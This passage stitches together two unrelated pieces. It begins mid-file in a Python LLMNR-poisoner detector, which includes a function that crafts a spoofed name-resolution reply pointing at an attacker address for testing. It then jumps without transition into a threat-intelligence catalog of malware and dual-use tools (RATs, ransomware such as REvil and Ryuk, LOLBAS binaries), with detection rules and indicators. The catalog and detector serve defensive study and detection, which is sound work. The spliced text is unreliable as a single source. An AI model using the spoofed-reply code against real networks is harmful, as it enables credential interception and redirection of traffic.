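    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def build_poisoned_answer(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """The reply a poisoner sends: same ID and question, QR set, one A record
    pointing at the attacker. The answer repeats the full name here rather
    than using a compression pointer (constructed for the example)."""
    txid = struct.unpack("!H", query[:2])[0]
    q_end = query.index(b"\x00", 12) + 1 + 4     # QNAME terminator + QTYPE/QCLASS
    question = query[12:q_end]
    header = struct.pack("!HHHHHH", txid, QR_BIT, 1, 1, 0, 0)
    rr = question[:-4] + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + rr


def read_name(pkt: bytes, off: int, depth: int = 0) -> tuple[str, int]:
    """Decode labels; follows DNS-style compression pointers a bounded number of times."""
    labels = []
    while True:
        ln = pkt[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:
            if depth > 4:
                raise ValueError("pointer loop")
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            tail, _ = read_name(pkt, ptr, depth + 1)
            return ".".join(labels + [tail]), off + 2
        labels.append(pkt[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln


def parse_packet(pkt: bytes) -> dict:
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    qname, off = read_name(pkt, 12)
    off += 4                                      # skip QTYPE/QCLASS
    answers = []
    for _ in range(an):
        _name, off = read_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:             # A record
            answers.append(socket.inet_ntoa(pkt[off:off + 4]))
        off += rdlen
    return {"id": txid, "is_response": bool(flags & QR_BIT),
            "qname": qname, "answers": answers}


def is_poisoner_response(query_id: int, pkt: bytes, canary_names: set[str]) -> bool:
    """Canary names are chosen so that no legitimate host owns them; a matching
    answer therefore comes from something answering every query, which is
    what an LLMNR poisoner does."""
    try:
        ans = parse_packet(pkt)
    except (IndexError, ValueError, struct.error, UnicodeDecodeError):
        return False                              # truncated or non-LLMNR datagram
    return (ans["is_response"] and ans["id"] == query_id
            and ans["qname"].lower() in {n.lower() for n in canary_names}
            and bool(ans["answers"]))


if __name__ == "__main__":
    canary = "wpad-canary-7f3a"                   # constructed canary name
    q = build_query(canary, 0x1234)
    r = build_poisoned_answer(q, "192.0.2.66")    # constructed attacker address
    print(parse_packet(r))
    print("poisoner present:", is_poisoner_response(0x1234, r, {canary}))
```

A probe loop would send build_query() for a fresh random canary to LLMNR_GROUP, then feed every datagram received on port 5355 to is_poisoner_response(); the transaction-ID and canary-name checks keep ordinary replies to real names from being reported.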

Revenge RAT

[Revenge RAT](https://app.tidalcyber.com/software/f99712b4-37a2-437c-92d7-fb4f94a1f892) is a freely available remote access tool written in .NET (C#).<sup>[[Cylance Shaheen Nov 2018](https://app.tidalcyber.com/references/57802e46-e12c-4230-8d1c-08854a0de06a)]</sup><sup>[[Cofense RevengeRAT Feb 2019](https://app.tidalcyber.com/references/3abfc3eb-7f9d-49e5-8048-4118cde3122e)]</sup>

The tag is: misp-galaxy:software="Revenge RAT"

Sodinokibi - Associated Software

The tag is: misp-galaxy:software="Sodinokibi - Associated Software"

Sodin - Associated Software

The tag is: misp-galaxy:software="Sodin - Associated Software"

REvil

[REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd), which has been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.<sup>[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)]</sup><sup>[[Intel 471 REvil March 2020](https://app.tidalcyber.com/references/b939dc98-e00e-4d47-84a4-3eaaeb5c0abf)]</sup><sup>[[Group IB Ransomware May 2020](https://app.tidalcyber.com/references/18d20965-f1f4-439f-a4a3-34437ad1fe14)]</sup>

The tag is: misp-galaxy:software="REvil"

RGDoor

[RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) has been seen deployed on webservers belonging to Middle Eastern government organizations. [RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) provides backdoor access to compromised IIS servers. <sup>[[Unit 42 RGDoor Jan 2018](https://app.tidalcyber.com/references/94b37da6-f808-451e-8f2d-5df0e93358ca)]</sup>

The tag is: misp-galaxy:software="RGDoor"

Rifdoor

The tag is: misp-galaxy:software="Rifdoor"

Rising Sun

[Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://app.tidalcyber.com/campaigns/57e858c8-fd0b-4382-a178-0165d03aa8a9) between 2017 and 2019. [Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) included some source code from [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08)'s Trojan Duuzer.<sup>[[McAfee Sharpshooter December 2018](https://app.tidalcyber.com/references/96b6d012-8620-4ef5-bf9a-5f88e465a495)]</sup>

The tag is: misp-galaxy:software="Rising Sun"

ROADTools

[ROADTools](https://app.tidalcyber.com/software/15bc8e94-64d1-4f1f-bc99-08cfbac417dc) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.<sup>[[ROADtools Github](https://app.tidalcyber.com/references/90c592dc-2c9d-401a-96ab-b539f7522956)]</sup>

The tag is: misp-galaxy:software="ROADTools"

RobbinHood

[RobbinHood](https://app.tidalcyber.com/software/b65956ef-439a-463d-b85e-6606467f508a) is ransomware that was first observed being used in an attack against the Baltimore city government’s computer network.<sup>[[CarbonBlack RobbinHood May 2019](https://app.tidalcyber.com/references/cb9e49fa-253a-447a-9c88-c6e507bae0bb)]</sup><sup>[[BaltimoreSun RobbinHood May 2019](https://app.tidalcyber.com/references/f578de81-ea6b-49d0-9a0a-111e07249cd8)]</sup>

The tag is: misp-galaxy:software="RobbinHood"

ROCKBOOT

The tag is: misp-galaxy:software="ROCKBOOT"

RogueRobin

The tag is: misp-galaxy:software="RogueRobin"

ROKRAT

[ROKRAT](https://app.tidalcyber.com/software/a3479628-af0b-4088-8d2a-fafa384731dd) is a cloud-based remote access tool (RAT) used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) to target victims in South Korea. [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) has used ROKRAT during several campaigns from 2016 through 2021.<sup>[[Talos ROKRAT](https://app.tidalcyber.com/references/1bd78a2f-2bc6-426f-ac9f-16bf3fdf4cdf)]</sup><sup>[[Talos Group123](https://app.tidalcyber.com/references/bf8b2bf0-cca3-437b-a640-715f9cc945f7)]</sup><sup>[[Volexity InkySquid RokRAT August 2021](https://app.tidalcyber.com/references/bff1667b-3f87-4653-bd17-b675e997baf1)]</sup>

The tag is: misp-galaxy:software="ROKRAT"

RotaJakiro

[RotaJakiro](https://app.tidalcyber.com/software/169bfcf6-544c-5824-a7cd-2d5070304b57) is a 64-bit Linux backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). First seen in 2018, it uses a plugin architecture to extend capabilities. [RotaJakiro](https://app.tidalcyber.com/software/169bfcf6-544c-5824-a7cd-2d5070304b57) can determine its permission level and execute according to access type (root or user).<sup>[[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)]</sup><sup>[[netlab360 rotajakiro vs oceanlotus](https://app.tidalcyber.com/references/20967c9b-5bb6-5cdd-9466-2c9efd9ab98c)]</sup>

The tag is: misp-galaxy:software="RotaJakiro"

route

[route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af) can be used to find or change information within the local system IP routing table. <sup>[[TechNet Route](https://app.tidalcyber.com/references/0e483ec8-af40-4139-9711-53b999e069ee)]</sup>

The tag is: misp-galaxy:software="route"

Rover

[Rover](https://app.tidalcyber.com/software/ef38ff3e-fa36-46f2-a720-3abaca167b04) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. <sup>[[Palo Alto Rover](https://app.tidalcyber.com/references/bbdf3f49-9875-4d41-986d-b693e82c77e1)]</sup>

The tag is: misp-galaxy:software="Rover"

Royal

[Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. [Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) has been used in attacks against multiple industries worldwide, including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) and [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) attacks and noted a possible connection between their operators.<sup>[[Microsoft Royal ransomware November 2022](https://app.tidalcyber.com/references/91efc6bf-e15c-514a-96c1-e838268d222f)]</sup><sup>[[Cybereason Royal December 2022](https://app.tidalcyber.com/references/28aef64e-20d3-5227-a3c9-e657c6e2d07e)]</sup><sup>[[Kroll Royal Deep Dive February 2023](https://app.tidalcyber.com/references/dcdcc965-56d0-58e6-996b-d8bd40916745)]</sup><sup>[[Trend Micro Royal Linux ESXi February 2023](https://app.tidalcyber.com/references/e5bb846f-d11f-580c-b96a-9de4ba5eaed6)]</sup><sup>[[CISA Royal AA23-061A March 2023](https://app.tidalcyber.com/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]</sup>

The tag is: misp-galaxy:software="Royal"

Rpcping.exe - Associated Software

<sup>[[Rpcping.exe - LOLBAS Project](/references/dc15a187-4de7-422e-a507-223e89e317b1)]</sup>

The tag is: misp-galaxy:software="Rpcping.exe - Associated Software"

Rpcping

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to verify rpc connection

Author: Oddvar Moe

Paths: * C:\Windows\System32\rpcping.exe * C:\Windows\SysWOW64\rpcping.exe

Detection: * Sigma: proc_creation_win_rpcping_credential_capture.yml<sup>[[Rpcping.exe - LOLBAS Project](/references/dc15a187-4de7-422e-a507-223e89e317b1)]</sup>

The tag is: misp-galaxy:software="Rpcping"

Rsockstun

Rsockstun is an open-source software project. According to its GitHub repository, Rsockstun is a reverse socks5 tunneler with SSL, ntlm, and proxy support.<sup>[[GitHub rsockstun](/references/1644457f-75d6-4064-a11b-9217249fa5e6)]</sup>

The tag is: misp-galaxy:software="Rsockstun"

Redaman - Associated Software

The tag is: misp-galaxy:software="Redaman - Associated Software"

RTM

[RTM](https://app.tidalcyber.com/software/1836485e-a3a6-4fae-a15d-d0990788811a) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://app.tidalcyber.com/groups/666ab5f0-3ef1-4e74-8a10-65c60a7d1acd)). Newer versions of the malware have been reported publicly as Redaman.<sup>[[ESET RTM Feb 2017](https://app.tidalcyber.com/references/ab2cced7-05b8-4788-8d3c-8eadb0aaf38c)]</sup><sup>[[Unit42 Redaman January 2019](https://app.tidalcyber.com/references/433cd55a-f912-4d5a-aff6-92133d08267b)]</sup>

The tag is: misp-galaxy:software="RTM"

Rubeus

[Rubeus](https://app.tidalcyber.com/software/2e54f40c-ab62-535e-bbab-3f3a835ff55a) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.<sup>[[GitHub Rubeus March 2023](https://app.tidalcyber.com/references/4bde7ce6-7fc6-5660-a8aa-745f19350ee1)]</sup><sup>[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)]</sup><sup>[[DFIR Ryuk’s Return October 2020](https://app.tidalcyber.com/references/eba1dafb-ff62-4d34-b268-3b9ba6a7a822)]</sup><sup>[[DFIR Ryuk 2 Hour Speed Run November 2020](https://app.tidalcyber.com/references/3b904516-3b26-4caa-8814-6e69b76a7c8c)]</sup>

The tag is: misp-galaxy:software="Rubeus"

Ruler

[Ruler](https://app.tidalcyber.com/software/69563cbd-7dc1-4396-b576-d5886df11046) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://app.tidalcyber.com/software/69563cbd-7dc1-4396-b576-d5886df11046) have also released a defensive tool, NotRuler, to detect its usage.<sup>[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)]</sup><sup>[[SensePost NotRuler](https://app.tidalcyber.com/references/1bafe35e-f99c-4aa9-8b2f-5a35970ec83b)]</sup>

The tag is: misp-galaxy:software="Ruler"

Rundll32.exe - Associated Software

<sup>[[Rundll32.exe - LOLBAS Project](/references/90aff246-ce27-4f21-96f9-38543718ab07)]</sup>

The tag is: misp-galaxy:software="Rundll32.exe - Associated Software"

Rundll32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to execute dll files

Author: Oddvar Moe

Paths: * C:\Windows\System32\rundll32.exe * C:\Windows\SysWOW64\rundll32.exe

Detection: * Sigma: [net_connection_win_rundll32_net_connections.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml) * Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml) * Elastic: [defense_evasion_unusual_network_connection_via_rundll32.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml) * IOC: Outbound Internet/network connections made from rundll32 * IOC: Suspicious use of cmdline flags such as -sta<sup>[[Rundll32.exe - LOLBAS Project](/references/90aff246-ce27-4f21-96f9-38543718ab07)]</sup>

The tag is: misp-galaxy:software="Rundll32"

Runexehelper.exe - Associated Software

<sup>[[Runexehelper.exe - LOLBAS Project](/references/86ff0379-2b73-4981-9f13-2b02b53bc90f)]</sup>

The tag is: misp-galaxy:software="Runexehelper.exe - Associated Software"

Runexehelper

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Launcher process

Author: Grzegorz Tworek

Paths: * c:\windows\system32\runexehelper.exe

Detection: * Sigma: [proc_creation_win_lolbin_runexehelper.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml) * IOC: c:\windows\system32\runexehelper.exe is run * IOC: Existence of runexewithargs_output.txt file<sup>[[Runexehelper.exe - LOLBAS Project](/references/86ff0379-2b73-4981-9f13-2b02b53bc90f)]</sup>

The tag is: misp-galaxy:software="Runexehelper"

RunningRAT

[RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) and [Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0). <sup>[[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]</sup>

The tag is: misp-galaxy:software="RunningRAT"

Runonce.exe - Associated Software

<sup>[[Runonce.exe - LOLBAS Project](/references/b97d4b16-ead2-4cc7-90e5-f8b05d84faf3)]</sup>

The tag is: misp-galaxy:software="Runonce.exe - Associated Software"

Runonce

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Executes a Run Once Task that has been configured in the registry

Author: Oddvar Moe

Paths: * C:\Windows\System32\runonce.exe * C:\Windows\SysWOW64\runonce.exe

Detection: * Sigma: [registry_event_runonce_persistence.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml) * Sigma: [proc_creation_win_runonce_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml) * Elastic: [persistence_run_key_and_startup_broad.toml](https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml) * IOC: Registry key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY<sup>[[Runonce.exe - LOLBAS Project](/references/b97d4b16-ead2-4cc7-90e5-f8b05d84faf3)]</sup>

The tag is: misp-galaxy:software="Runonce"

Runscripthelper.exe - Associated Software

<sup>[[Runscripthelper.exe - LOLBAS Project](/references/6d7151e3-685a-4dc7-a44d-aefae4f3db6a)]</sup>

The tag is: misp-galaxy:software="Runscripthelper.exe - Associated Software"

Runscripthelper

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Execute target PowerShell script

Author: Oddvar Moe

Paths: * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

The tag is: misp-galaxy:software="Runscripthelper"

Ryuk

[Ryuk](https://app.tidalcyber.com/software/8ae86854-4cdc-49eb-895a-d1fa742f7974) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://app.tidalcyber.com/software/8ae86854-4cdc-49eb-895a-d1fa742f7974) shares code similarities with Hermes ransomware.<sup>[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)]</sup><sup>[[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)]</sup><sup>[[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]</sup>

The tag is: misp-galaxy:software="Ryuk"

Saint Bot

[Saint Bot](https://app.tidalcyber.com/software/d66e5d18-e9f5-4091-bdf4-acdac129e2e0) is a .NET downloader that has been used by [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) since at least March 2021.<sup>[[Malwarebytes Saint Bot April 2021](https://app.tidalcyber.com/references/3a1faa47-7bd3-453f-9b7a-bb17efb8bb3c)]</sup><sup>[[Palo Alto Unit 42 OutSteel SaintBot February 2022](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)]</sup>

The tag is: misp-galaxy:software="Saint Bot"

Sakurel - Associated Software

The tag is: misp-galaxy:software="Sakurel - Associated Software"

VIPER - Associated Software

The tag is: misp-galaxy:software="VIPER - Associated Software"

Sakula

[Sakula](https://app.tidalcyber.com/software/a316c704-144a-4d14-8e4e-685bb6ae391c) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. <sup>[[Dell Sakula](https://app.tidalcyber.com/references/e9a2ffd8-7aed-4343-8678-66fc3e758d19)]</sup>

The tag is: misp-galaxy:software="Sakula"

Samas - Associated Software

The tag is: misp-galaxy:software="Samas - Associated Software"

SamSam

[SamSam](https://app.tidalcyber.com/software/88831e9f-453e-466f-9510-9acaa1f20368) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.<sup>[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]</sup><sup>[[Talos SamSam Jan 2018](https://app.tidalcyber.com/references/0965bb64-be96-46b9-b60f-6829c43a661f)]</sup><sup>[[Sophos SamSam Apr 2018](https://app.tidalcyber.com/references/4da5e9c3-7205-4a6e-b147-be7c971380f0)]</sup><sup>[[Symantec SamSam Oct 2018](https://app.tidalcyber.com/references/c5022a91-bdf4-4187-9967-dfe6362219ea)]</sup>

The tag is: misp-galaxy:software="SamSam"

Sardonic

[Sardonic](https://app.tidalcyber.com/software/9ab0d523-3496-5e64-9ca1-bb756f5e64e0) is a backdoor written in C and C++ that is known to be used by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) since at least August 2021, when it was deployed against a financial institution in the United States. [Sardonic](https://app.tidalcyber.com/software/9ab0d523-3496-5e64-9ca1-bb756f5e64e0) has a plugin system that can load specially made DLLs and execute their functions.<sup>[[Bitdefender Sardonic Aug 2021](https://app.tidalcyber.com/references/8e9d05c9-6783-5738-ac85-a444810a8074)]</sup><sup>[[Symantec FIN8 Jul 2023](https://app.tidalcyber.com/references/9b08b7f0-1a33-5d76-817f-448fac0d165a)]</sup>

The tag is: misp-galaxy:software="Sardonic"

Sc.exe - Associated Software

<sup>[[Sc.exe - LOLBAS Project](/references/5ce3ef73-f789-4939-a60e-e0a373048bda)]</sup>

The tag is: misp-galaxy:software="Sc.exe - Associated Software"

Sc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to manage services

Author: Oddvar Moe

Paths: * C:\Windows\System32\sc.exe * C:\Windows\SysWOW64\sc.exe

The tag is: misp-galaxy:software="Sc"

schtasks.exe - Associated Software

The tag is: misp-galaxy:software="schtasks.exe - Associated Software"

schtasks

[schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. <sup>[[TechNet Schtasks](https://app.tidalcyber.com/references/17c03e27-222d-41b5-9fa2-34f0939e5371)]</sup>

The tag is: misp-galaxy:software="schtasks"

Scriptrunner.exe - Associated Software

<sup>[[Scriptrunner.exe - LOLBAS Project](/references/805d16cc-8bd0-4f80-b0ac-c5b5df51427c)]</sup>

The tag is: misp-galaxy:software="Scriptrunner.exe - Associated Software"

Scriptrunner

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Execute binary through proxy binary to evade defensive counter measures

Author: Oddvar Moe

Paths: * C:\Windows\System32\scriptrunner.exe * C:\Windows\SysWOW64\scriptrunner.exe

Detection: * Sigma: [proc_creation_win_servu_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml) * IOC: Scriptrunner.exe should not be in use unless App-v is deployed<sup>[[Scriptrunner.exe - LOLBAS Project](/references/805d16cc-8bd0-4f80-b0ac-c5b5df51427c)]</sup>

The tag is: misp-galaxy:software="Scriptrunner"

Scrobj.dll - Associated Software

<sup>[[Scrobj.dll - LOLBAS Project](/references/c50ff71f-c742-4d63-a18e-e1ce41d55193)]</sup>

The tag is: misp-galaxy:software="Scrobj.dll - Associated Software"

Scrobj

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Script Component Runtime

Author: Eral4m

Paths: * c:\windows\system32\scrobj.dll * c:\windows\syswow64\scrobj.dll

Detection: * IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line<sup>[[Scrobj.dll - LOLBAS Project](/references/c50ff71f-c742-4d63-a18e-e1ce41d55193)]</sup>

The tag is: misp-galaxy:software="Scrobj"

SDBbot

[SDBbot](https://app.tidalcyber.com/software/046bbd0c-bff5-46fc-9028-cbe46a9f8ec5) is a backdoor with installer and loader components that has been used by [TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) since at least 2019.<sup>[[Proofpoint TA505 October 2019](https://app.tidalcyber.com/references/711ea2b3-58e2-4b38-aa71-877029c12e64)]</sup><sup>[[IBM TA505 April 2020](https://app.tidalcyber.com/references/bcef8bf8-5fc2-4921-b920-74ef893b8a27)]</sup>

The tag is: misp-galaxy:software="SDBbot"

SDelete

[SDelete](https://app.tidalcyber.com/software/3d4be65d-231b-44bb-8d12-5038a3d48bae) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. <sup>[[Microsoft SDelete July 2016](https://app.tidalcyber.com/references/356c7d49-5abc-4566-9657-5ce58cf7be67)]</sup>

The tag is: misp-galaxy:software="SDelete"

SeaDaddy - Associated Software

The tag is: misp-galaxy:software="SeaDaddy - Associated Software"

SeaDesk - Associated Software

The tag is: misp-galaxy:software="SeaDesk - Associated Software"

SeaDuke

[SeaDuke](https://app.tidalcyber.com/software/ae30d58e-21c5-41a4-9ebb-081dc1f26863) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://app.tidalcyber.com/software/c2353daa-fd4c-44e1-8013-55400439965a). <sup>[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]</sup>

The tag is: misp-galaxy:software="SeaDuke"

Seasalt

The tag is: misp-galaxy:software="Seasalt"

SEASHARPEE

The tag is: misp-galaxy:software="SEASHARPEE"

Seatbelt

Seatbelt is a tool used to perform numerous security-oriented checks.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Seatbelt"

secretsdump.py - Associated Software

The tag is: misp-galaxy:software="secretsdump.py - Associated Software"

secretsdump

According to joint Cybersecurity Advisory AA23-319A (November 2023), secretsdump is a Python script "used to extract credentials and other confidential information from a system".<sup>[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)]</sup> Secretsdump is publicly available and included as a module of Impacket, a tool for working with network protocols.<sup>[[GitHub secretsdump](/references/c29a90a7-016f-49b7-a970-334290964f19)]</sup>

The tag is: misp-galaxy:software="secretsdump"

ServHelper

[ServHelper](https://app.tidalcyber.com/software/704ed49d-103c-4b33-b85c-73670cc1d719) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.<sup>[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]</sup>

The tag is: misp-galaxy:software="ServHelper"

Seth-Locker

[Seth-Locker](https://app.tidalcyber.com/software/fb47c051-d22b-4a05-94a7-cf979419b60a) is a ransomware with some remote control capabilities that has been in use since at least 2021. <sup>[[Trend Micro Ransomware February 2021](https://app.tidalcyber.com/references/64a86a3f-0160-4766-9ac1-7d287eb2c323)]</sup>

The tag is: misp-galaxy:software="Seth-Locker"

Setres.exe - Associated Software

<sup>[[Setres.exe - LOLBAS Project](/references/631de0bd-d536-4183-bc5a-25af83bd795a)]</sup>

The tag is: misp-galaxy:software="Setres.exe - Associated Software"

Setres

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Configures display settings

Author: Grzegorz Tworek

Paths: * c:\windows\system32\setres.exe

